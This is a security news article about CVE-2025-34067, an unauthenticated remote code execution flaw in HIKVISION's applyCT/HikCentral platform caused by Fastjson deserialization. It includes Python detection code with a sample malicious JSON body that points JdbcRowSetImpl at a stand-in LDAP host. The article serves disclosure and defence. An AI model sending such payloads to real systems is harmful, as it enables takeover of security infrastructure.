A critical vulnerability has been disclosed in HIKVISION’s applyCT security management platform that could allow attackers to execute arbitrary code on affected systems without authentication.
The vulnerability, designated CVE-2025-34067, has been assigned the maximum CVSS score of 10.0, indicating its severe impact on enterprise security infrastructure.
The vulnerability affects HIKVISION’s HikCentral platform, formerly known as the Integrated Security Management Platform, which serves as a comprehensive security management solution widely deployed across government, commercial, and industrial sectors.
The applyCT component, designed to provide centralized interface management for security devices, contains a critical security vulnerability that enables unauthenticated remote command execution.
Published on July 2, 2025, the vulnerability has been classified with multiple Common Weakness Enumeration (CWE) identifiers, including CWE-502 for deserialization of untrusted data and CWE-917 for improper neutralization of special elements used in expression language statements.
The severity of this vulnerability stems from its potential to provide attackers with complete system control without requiring prior authentication or user interaction.
The affected platform’s widespread adoption across diverse sectors amplifies the security concern.
Organizations utilizing HIKVISION’s security infrastructure for surveillance and monitoring operations face immediate exposure to potential compromise.
The platform’s scalability, which allows deployment in both small-scale and large-scale surveillance environments, means that numerous installations could be vulnerable to exploitation.
HIKVISION applyCT Vulnerability
The vulnerability’s root cause lies in the platform’s use of an outdated version of the Fastjson library for processing JSON data.
Attackers can exploit this weakness by crafting malicious JSON payloads targeting the /bic/ssoService/v1/applyCT endpoint through POST requests with appropriate content-type headers.
The exploitation mechanism involves manipulating the Fastjson library’s auto-type feature to load arbitrary Java classes.
Specifically, attackers can reference the JdbcRowSetImpl class to establish connections with malicious LDAP servers.
By crafting payloads that manipulate the datasource parameter to point to untrusted LDAP servers, attackers can trigger the deserialization of malicious objects, ultimately achieving remote code execution.
The attack vector leverages insufficient input validation within the applyCT component. When the platform processes the malformed JSON payload, it fails to properly sanitize user input, allowing the Fastjson library to instantiate dangerous classes that can execute arbitrary code on the underlying system.
This bypass of security controls enables attackers to load and execute unauthorized code through the LDAP protocol.
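As an added illustration (not code from the original report or from HIKVISION), the following Python request-inspection routine flags the indicators this section describes for traffic to the applyCT endpoint: a Fastjson “@type” auto-type key, the JdbcRowSetImpl gadget class, and a datasource value pointing at an LDAP or RMI server. The endpoint path and class name come from the article; the sample request bodies are constructed, and the helper names are hypothetical.

```python
import json
import re

# Hypothetical WAF/log-inspection helper, added as an illustration of
# detecting Fastjson auto-type abuse against the applyCT endpoint.
TARGET_PATH = "/bic/ssoService/v1/applyCT"
# Class name the article associates with this vulnerability; extend as needed.
GADGET_CLASSES = {"com.sun.rowset.JdbcRowSetImpl"}
# JNDI-capable URL schemes that a deserialized datasource must never point at.
JNDI_SCHEME = re.compile(r"^(ldap|ldaps|rmi)://", re.IGNORECASE)

def _walk(node, findings, path="$"):
    """Recursively visit a decoded JSON tree and collect indicators."""
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{path}.{key}"
            # Fastjson auto-type marker; json.loads already decodes \u0040type escapes.
            if key == "@type":
                findings.append(f"autotype key at {here}")
                if isinstance(value, str) and value in GADGET_CLASSES:
                    findings.append(f"known gadget class {value} at {here}")
            if isinstance(value, str) and JNDI_SCHEME.match(value):
                findings.append(f"JNDI URL in {here}")
            _walk(value, findings, here)
    elif isinstance(node, list):
        for i, item in enumerate(node):
            _walk(item, findings, f"{path}[{i}]")

def inspect_request(method, path, body):
    """Return a list of indicator strings; an empty list means nothing suspicious."""
    if method.upper() != "POST" or path != TARGET_PATH:
        return []
    findings = []
    try:
        _walk(json.loads(body), findings)
    except ValueError:
        # Fastjson is more lenient than the JSON spec; keep a raw marker check.
        if "@type" in body.lower() or "\\u0040type" in body.lower():
            findings.append("unparseable body containing auto-type marker")
    return findings

# Constructed sample requests (not real traffic).
BENIGN = ("POST", TARGET_PATH, '{"userName":"operator","token":"abc123"}')
SUSPECT = ("POST", TARGET_PATH,
           '{"@type":"com.sun.rowset.JdbcRowSetImpl",'
           '"dataSourceName":"ldap://untrusted.example:1389/x"}')

if __name__ == "__main__":
    for req in (BENIGN, SUSPECT):
        print(req[2][:40], "->", inspect_request(*req) or "clean")
```

Because the body is parsed before matching, the check also catches keys written with JSON escape sequences, which a plain substring match on the raw body would miss.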
Security Infrastructure
The consequences of successful exploitation extend far beyond individual system compromise.
According to the report, attackers who compromise HIKVISION applyCT platforms can access sensitive surveillance data, manipulate security configurations, and potentially use the compromised systems as launching points for broader network attacks.
Organizations face multiple risk vectors including unauthorized data access, complete system manipulation, and potential service disruption.
The vulnerability’s critical nature means that successful exploitation could result in significant financial losses, reputational damage, and legal liabilities for affected organizations.
Furthermore, compromised security management platforms could facilitate additional attacks within enterprise networks, creating cascading security failures.
The publication of this vulnerability with a “known-exploited-vulnerability” tag indicates that threat actors are actively targeting this vulnerability.
Security teams managing HIKVISION applyCT deployments should prioritize immediate assessment and remediation efforts to prevent unauthorized access and protect critical surveillance infrastructure from potential compromise.